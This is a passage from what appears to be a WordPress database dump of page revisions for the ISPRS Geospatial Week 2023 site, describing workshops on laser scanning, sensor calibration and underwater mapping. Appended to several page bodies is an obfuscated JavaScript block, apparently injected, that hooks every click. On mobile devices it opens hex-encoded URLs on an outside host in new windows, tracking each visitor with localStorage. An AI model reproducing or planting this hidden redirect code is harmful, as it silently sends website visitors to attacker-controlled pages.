)|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Laser Scanning 2023</strong>','','inherit','closed','closed','','2949-autosave-v1','','','2023-02-05 14:23:04','2023-02-05 14:23:04','',2949,'https://gsw2023.com/?p=3834',0,'revision','',0),
(3835,1,'2023-02-05 14:30:23','2023-02-05 14:30:23','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3267\" img_size=\"617x470\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\">SO&amp;C: Sensor orientation and calibration for mapping and navigation purposes</span></strong></h5>\n<h5></h5>\n<h5></h5>\n<h5></h5>\n<p>&nbsp;</p>\n<h5 style=\"text-align: justify; color: black;\"><strong>This workshop will concern various aspects of the research and implementations focused on the issues of sensor orientation and calibration. It will be an opportunity to present and to know the newest achievements in this scope related to ground-based, airborne and satellite systems. Technology brings new sensors constantly in aerial and satellite photogrammetry and remote sensing. Experimental works about the calibration and orientation of new technological solutions for mapping purposes are essential for worldwide photogrammetric society. The workshop will also be the opportunity to discuss the low-cost solutions used for mapping and navigation purposes. Since they are becoming increasingly popular nowadays, the quality of data collected by them can not be guaranteed without including sensor calibration and proper orientation methods.</strong></h5>\n<h5 style=\"text-align: justify; color: black;\"><strong>The workshop will be part of the ISPRS Geospatial Week 2023. It will be hosted by the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops. Any interested scientists and professionals can apply their submissions related to various remote sensing (optical, lidar, thermal, radar, lidar) and navigational (GNSS devices, IMUs, radar, magnetometers, odometers etc.) sensors collected with any platform to present them with thematic oral and poster sessions.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1><strong>Chairs</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"59\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><strong><u>Themes of the event:</u></strong></h5>\n<ul>\n<li><strong>State-of-the-art in orientation approaches of multi-sensor systems</strong></li>\n<li><strong>New calibration methods of mobile mapping platforms and systems for mapping and navigation purposes</strong></li>\n<li><strong>Challenges in aerial sensors calibration and orientation</strong></li>\n<li><strong>Testing new sensors and systems available in the market using the field-based and laboratory approaches</strong></li>\n<li><strong>Validation of satellite sensors in spectral and spatial quality, including testing micro- and nanosatellites</strong></li>\n<li><strong>Concepts of test fields for calibration of sensors, including the possibilities for aerial, low-altitude and terrestrial sensors</strong></li>\n<li><strong>New validation methods and case studies of photogrammetric and lidar sensors mainly referred to low-cost devices (i.e. hand scanners, smartphones)</strong></li>\n<li><strong>Sensors benchmarking – concepts and examples</strong></li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong><u>Scientific Committee: (to be announced)</u></strong></h5>\n<ul>\n<li><strong>Khrystyna Burshtynska, Lviv Polytechnic National University, Ukraine</strong></li>\n<li><strong>Michael Cramer, University of Stuttgart, Germany</strong></li>\n<li><strong>Dorota Iwaszczuk, Technical University of Darmstadt, Germany</strong></li>\n<li><strong>Zdzisław Kurczyński, Warsaw University of Technology, Poland</strong></li>\n<li><strong>Jon Mills, Newcastle University, United Kingdom</strong></li>\n<li><strong>Fabio Remondino, Bruno Kessler Foundation FBK, Italy</strong></li>\n<li><strong>Jan Skaloud, Swiss Federal Institute of Technology EPFL, Switzerland</strong></li>\n<li><strong>Guo Zhang, Wuhan University, China</strong></li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>SO&amp;C: Sensor orientation and calibration for mapping and navigation purposes</strong>','','inherit','closed','closed','','3266-revision-v1','','','2023-02-05 14:30:23','2023-02-05 14:30:23','',3266,'https://gsw2023.com/?p=3835',0,'revision','',0),
(3836,1,'2023-02-05 14:32:08','2023-02-05 14:32:08','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3349\" img_size=\"300x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Underwater Mapping Workshop : Geospatial techniques for underwater documentation, mapping and monitoring</strong></span></h5>\n<h5></h5>\n<h5></h5>\n<p>&nbsp;</p>\n<h5 style=\"text-align: justify;\">In recent years, there has been a growing interest in methods and techniques for documenting, mapping and monitoring inland, coastal and open sea underwater environments. Drivers are diverse and range from the research of traces from the past to the protection and sustainable use of natural resources, from monitoring of marine ecosystems to hydrological studies. This workshop will gather contributions on state of the art and future trends on, but not limited to, the following topics: underwater photogrammetry, through water airborne photo-bathymetry and lidar-bathymetry, acoustic and optical positioning, underwater geodetic surveying, visual inertial simultaneous localization and mapping, subsea metrology, multi and hyper spectral imaging, underwater autonomous unmanned and tethered systems, underwater change monitoring. The workshop will be part of the ISPRS Geospatial Week 2023 and is hosted by the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"turquoise\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"60\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"turquoise\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: blue;\"><u>Themes of event:</u></h5>\n<ul>\n<li>\n<h6><strong>Multimedia geometry for underwater image and range measurements</strong></h6>\n</li>\n<li>\n<h6><strong>Geometric calibration, colour correction and restoration, validation of systems for underwater 3D measurements</strong></h6>\n</li>\n<li>\n<h6><strong>Combined above-water, through-water and underwater techniques for 3D modelling and mapping of coastal habitat</strong></h6>\n</li>\n<li>\n<h6><strong>Lidar, photo and spectrally derived bathymetry for seafloor and water surface measurement</strong></h6>\n</li>\n<li>\n<h6><strong>Spaceborne techniques and applications for coastal mapping</strong></h6>\n</li>\n<li>\n<h6><strong>AI-driven solutions for through-water, underwater and habitat mapping applications</strong></h6>\n</li>\n<li>\n<h6><strong>Algorithms and methods for underwater localization, navigation and mapping, including, SLAM, visual inertial odometry, augmented and virtual reality applications</strong></h6>\n</li>\n<li>\n<h6><strong>Sensors’ integration and performance evaluation of UAVs, UUVs (ROVs and AUVs), towed vehicles and diver operated systems</strong></h6>\n</li>\n<li>\n<h6><strong>Underwater applications and methods in archaeology, habitat mapping and monitoring, industrial metrology and inspections, volumetric reconstruction for flow tracking</strong></h6>\n</li>\n<li>\n<h6><strong>Using/creating benchmark data sets</strong></h6>\n</li>\n</ul>\n<h5 style=\"text-align: justify; color: blue;\"><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Loïca Avanthey, SEAL, LRE, EPITA, France</strong></h6>\n</li>\n<li>\n<h6><strong>Michael Bleier, Computer Science VII: Robotics and Telematics, Julius-Maximilians-Universität Würzburg, Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Fabio Bruno, Department of Mechanical, Energetics and Management Engineering, University of Calabria, 3D Research s.r.l., Arcavacata di Rende, Italy</strong></h6>\n</li>\n<li>\n<h6><strong>Alessandro Capra, University of Modena and Reggio Emilia, Italy</strong></h6>\n</li>\n<li>\n<h6><strong>Silvio Del Pizzo, Parthenope University of Naples, Naples, Italy</strong></h6>\n</li>\n<li>\n<h6><strong>Pierre Drap, LIS UMR CNRS, Marseille, France, France</strong></h6>\n</li>\n<li>\n<h6><strong>Nuno Gracias, ViCOROB - Computer vision and robotics research Institute, Universitat de Girona, Spain</strong></h6>\n</li>\n<li>\n<h6><strong>Kevin Köser, Oceanic Machine Vision, GEOMAR Helmholtz Centre for Ocean Research Kiel, Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Hans-Gerd Maas, Institute of Photogrammetry and Remote Sensing, TU Dresden, Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Nikola Miskovic, Laboratory for Underwater Systems and Technologies – LABUST, Faculty of Electrical Engineering and Computing, Department of Control and Computer Engineering, University of Zagreb, Croatia</strong></h6>\n</li>\n<li>\n<h6><strong>Mohammad Motasem Nawaf, Aix-Marseille University, LIS UMR CNRS, Marseille, France</strong></h6>\n</li>\n<li>\n<h6><strong>Gaia Pavoni, Visual Computing Lab, Institute of Information Science and Technologies \"Alessandro Faedo\" (ISTI), CNR, Italy</strong></h6>\n</li>\n<li>\n<h6><strong>Alessandro Ridolfi, Dipartimento di Ingegneria Industriale (DIEF), Università degli Studi di Firenze, Firenze, Italy</strong></h6>\n</li>\n<li>\n<h6><strong>Katja Richter, Institute of Photogrammetry and Remote Sensing, TU Dresden, Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Robin Rofallski, Jade University of Applied Sciences, Oldenburg &amp; KARO3D Vision, Oldenburg, Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Mark Shortis, FSSSI FRICS (Retired) Honorary Professor, School of Science RMIT University, Melbourne, Australia</strong></h6>\n</li>\n<li>\n<h6><strong>Tali Treibitz,  Viseaon Marine Imaging Lab, Charney School of Marine Sciences, University of Haifa, Israel</strong></h6>\n</li>\n<li>\n<h6><strong>Patrick Westfeld, Federal Maritime and Hydrographic Agency (BSH), Germany</strong></h6>\n</li>\n</ul>\n<h6><strong>.</strong></h6>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x